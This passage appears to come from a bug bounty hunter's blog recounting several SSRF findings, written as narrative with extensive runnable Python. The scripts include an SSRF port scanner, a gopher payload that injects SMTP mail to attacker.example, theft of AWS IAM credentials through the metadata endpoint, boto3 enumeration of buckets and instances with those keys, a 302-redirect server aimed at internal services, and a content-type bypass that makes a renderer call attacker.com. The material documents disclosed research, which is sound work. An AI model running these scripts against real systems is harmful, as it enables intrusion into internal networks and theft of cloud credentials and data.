This feedback mechanism made me realize that this was more than a simple CRUD app: the service must be issuing an HTTP request to the specified address. I put a Burp collaborator address in to confirm, and sure enough, I saw a request come in.
I was able to use the feedback mechanism to perform a local port scan and found a number of services online: SSH, SMTP, DNS, and a few others that I couldn’t identify by port. To get to work on proving the impact here, I ended up performing a similar set of tests to the ones I ran against DuckDuckGo: I checked redirect and gopher behavior and was lucky enough to find that both were available.
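Scripting that scan is straightforward. Here's a minimal sketch, assuming a hypothetical feedback endpoint and parameter name, that classifies ports by the error the service echoes back:

```python
import requests

# Hypothetical endpoint and parameter names; the real app exposed the
# target URL through its feedback feature, not a clean JSON API.
FEEDBACK = "https://target.example/api/feedback"

for port in (22, 25, 53, 80, 443, 3306, 6379):
    r = requests.post(
        FEEDBACK,
        json={"url": f"http://127.0.0.1:{port}/"},
        timeout=15,
    )
    # Closed ports tend to fail fast with "connection refused", while open
    # ports return a banner, a protocol error, or just take longer.
    if "refused" in r.text.lower():
        print(f"port {port}: closed")
    else:
        print(f"port {port}: open or filtered")
```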
Now that I had gopher available, I was able to prove some impact by crafting an SMTP message in gopher and firing it at localhost:25. Sure enough, moments later, a new email showed up in my inbox.
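Gopher makes this possible because everything after the type character in the URL gets written to the socket nearly verbatim, so a whole SMTP conversation fits in a single request. A sketch of how such a payload can be built (the addresses are placeholders, and the exact wrapper the service wanted may have differed):

```python
from urllib.parse import quote

# A complete SMTP session, one command per line; CRLF endings matter.
smtp_session = (
    "HELO localhost\r\n"
    "MAIL FROM:<ssrf@target.example>\r\n"
    "RCPT TO:<me@attacker.example>\r\n"
    "DATA\r\n"
    "Subject: SSRF proof of concept\r\n"
    "\r\n"
    "Hello from the inside.\r\n"
    ".\r\n"
    "QUIT\r\n"
)

# The leading "_" is the gopher type character; the percent-encoded
# remainder is replayed against the local SMTP server.
payload = "gopher://localhost:25/_" + quote(smtp_session)
print(payload)
```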
Aftermath
I was awarded $800 for this finding, which received a rating of high.
I was invited to a recently opened private program. If you’ve never been invited to a program that just opened up, you may not know the sense of “blood in the water” that comes with it: all of your fellow hackers and friends who also got an invite are going to start tearing the program up in the next couple of hours, and if you don’t want to miss out on any low-hanging fruit, you need to be quick.
I started my process off by deciding not to look at the core domain but to jump straight to interesting subdomains. I ran sublist3r and discovered a couple of subdomains that mentioned cms in their domain name. In my experience, cms services tend to have many problems, so this seemed like a great place to take a look. I didn’t find much on the home page of this asset, so I ran dirsearch to see if there was anything potentially interesting hidden on it.
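As an aside, sublist3r can also be driven as a Python module if you prefer scripting to one-off terminal runs. A sketch with a placeholder domain, using what I believe is its documented module interface:

```python
import sublist3r

# Placeholder domain; returns a list of discovered subdomain strings.
subdomains = sublist3r.main(
    "target.example",       # domain to enumerate
    40,                     # threads (used by the optional bruteforce)
    None,                   # savefile: don't write results to disk
    None,                   # ports: skip port probing
    silent=False,
    verbose=False,
    enable_bruteforce=False,
    engines=None,           # use all built-in search engines
)

# Surface the interesting ones, e.g. anything mentioning cms.
print([s for s in subdomains if "cms" in s])
```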
Sure enough, after about 15 minutes of pounding the asset I found an endpoint that mentioned something about user management that would 302 to another endpoint. That endpoint had a login page for some management system. What’s more, there were some javascript files that referenced an API on this asset.
After discovering that the qa subdomain of this asset had unobfuscated javascript, I was able to figure out how to call the api and what calls I had available to me. One of the calls was named createWebRequest and took one url parameter in a POST body.
By this point in my hacking I already knew that this asset was running on AWS, so I wasted no time in issuing a request through this api endpoint to the AWS metadata IP address. Sure enough, we got a hit.
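The call itself was a simple POST. A sketch of the idea with a hypothetical host and path (the real ones came out of the qa javascript, and whether the body was JSON or form-encoded is an assumption), chaining two requests to pull temporary credentials out of IMDSv1:

```python
import requests

# Hypothetical host/path; the real endpoint was referenced in the
# unobfuscated qa javascript.
API = "https://cms-qa.target.example/api/createWebRequest"

# IMDSv1 two-step: list the instance role name, then fetch its keys.
base = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
role = requests.post(API, json={"url": base}, timeout=15).text.strip()
creds = requests.post(API, json={"url": base + role}, timeout=15).text
print(creds)  # JSON with AccessKeyId, SecretAccessKey, and Token
```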
When I tried the AWS keys in the aws cli client, I found that I had an absurd level of access to dozens of S3 buckets, dozens more EC2 instances, Redis, etc. It was a critical in every sense of the word.
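If you would rather script that blast-radius check than poke around in the aws cli, the equivalent with boto3 looks something like this; the credential values are placeholders, and note that metadata-sourced keys are temporary and useless without the session token:

```python
import boto3

# Placeholder credentials lifted from the metadata response.
session = boto3.Session(
    aws_access_key_id="ASIA...",
    aws_secret_access_key="...",
    aws_session_token="...",
    region_name="us-east-1",
)

# Quick inventory of what the stolen role can see.
for bucket in session.client("s3").list_buckets()["Buckets"]:
    print("s3:", bucket["Name"])

reservations = session.client("ec2").describe_instances()["Reservations"]
print("ec2 instances:", sum(len(r["Instances"]) for r in reservations))
```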
Aftermath
I was paid $3,000 (max payout) and the report was marked as a critical.
This is the story of my most recent SSRF and, in a way, the most entertaining SSRF I’ve ever found. I started hacking on this new private program I was invited to, looking at the core asset for issues first. I found a couple of stored XSS bugs at this point and was in a really great mood. I was about to wrap up shop when I took a look at the burp collaborator instance that I had left open. What I saw surprised me.
As an aside: one of the things I do when I’m signing up for services that I’m going to hack on is use a burp collaborator instance as the inbox. It’s a good way for me to not pollute the email accounts I have with annoying advertisements after I’ve finished hacking on a service, and it also lets me see if anything interesting is happening after the fact.
Anyway, when I looked at burp collaborator, I noticed that it had received an HTTP request with a User-Agent that mentioned the service that I was hacking on. I thought to myself, “Did I just accidentally discover a feature that could be vulnerable to SSRF?!” I set out to figure out how to trigger this again.
Well, putting the timeline of requests together clearly explained what happened. I had just signed up for this service with an email like user@abc123.burpcollaborator.net and seconds later received both an SMTP message (email) and an HTTP request for the homepage.
I signed up again with an email address like user@1.2.3.4.xip.io to check whether 302 behavior was respected. After receiving the forwarded request in my burp collaborator instance, I wanted to confirm that gopher worked, as I had noticed that this request was fronted by Squid Proxy (which would probably block my attempts to access the internal network).
Similar to the previous stories, I checked the gopher protocol on a 302 redirect and noted that I was able to use it to interact with internal services. Unfortunately, there was no feedback of any kind so I wouldn’t be able to perform a port scan here. I decided to try for a localhost smtp message anyway to see if I could get lucky.
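The redirect trick is worth spelling out: the vulnerable fetcher requests a URL you control, your server answers with a 302 whose Location is the gopher payload, and the fetcher follows it right past the proxy. A minimal attacker-side sketch using only the standard library (payload truncated here; see the earlier story for a full SMTP session):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import quote

# Truncated stand-in for the full SMTP-over-gopher payload shown earlier.
GOPHER_PAYLOAD = "gopher://localhost:25/_" + quote("HELO localhost\r\n")

class Redirect(BaseHTTPRequestHandler):
    # Answer every GET with a 302 that bounces the fetcher onto gopher.
    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", GOPHER_PAYLOAD)
        self.end_headers()

# Port 80 needs privileges; any port you can point the SSRF at works.
HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()
```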
Sure enough, after crafting a message and performing the attack, I received a new email in my inbox proving that this SSRF was real and dangerous.
Aftermath
Well, unlike the previous stories, I have yet to get paid for this finding. The good news is that my report has been triaged as a high, so I’m just waiting for a final determination on the payout. I’ll probably post about it on my Twitter (which you should go follow if you haven’t yet).
I wish I could say that this story was inspired by Nahamsec and Daeken’s SSRF talk at Defcon, but I found this roughly a year before their talk was released. I was hacking on a new program for a company in the financial space. It was a product I had never seen (or heard of) before and was heavily involved in analytics. One of the features allowed you to upload images and store them for use in a couple of other features in the product.
Of course, one of the tests I wanted to perform here was “Can I upload HTML?” and, if so, “What happens if that HTML fetches external resources?”
I tried uploading an HTML file but found that the service rejected the upload. I then tried lying about the content type in the multipart upload by changing it to image/jpeg, and sure enough, the document uploaded fine.
Making a request to another endpoint, which gave you updates on the status of the document, would trigger an internal renderer/browser to issue a request to attacker.com.
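Stitched together, the whole chain fits in a few lines. A sketch with assumed endpoint names and response shapes, with attacker.com standing in for a server you control:

```python
import requests

TARGET = "https://analytics.target.example"  # placeholder hostname

# An HTML "image" that phones home when an internal renderer opens it.
html = b'<html><body><img src="https://attacker.com/pingback"></body></html>'

# Lie about the content type in the multipart part: the bytes are HTML,
# but the part claims image/jpeg, which is what the upload check trusts.
upload = requests.post(
    f"{TARGET}/api/images",                    # hypothetical endpoint
    files={"file": ("chart.jpg", html, "image/jpeg")},
)
doc_id = upload.json()["id"]                   # assumed response shape

# Hitting the status endpoint is what kicks off the internal renderer,
# which fetches the embedded resource and announces itself to attacker.com.
requests.get(f"{TARGET}/api/images/{doc_id}/status")
```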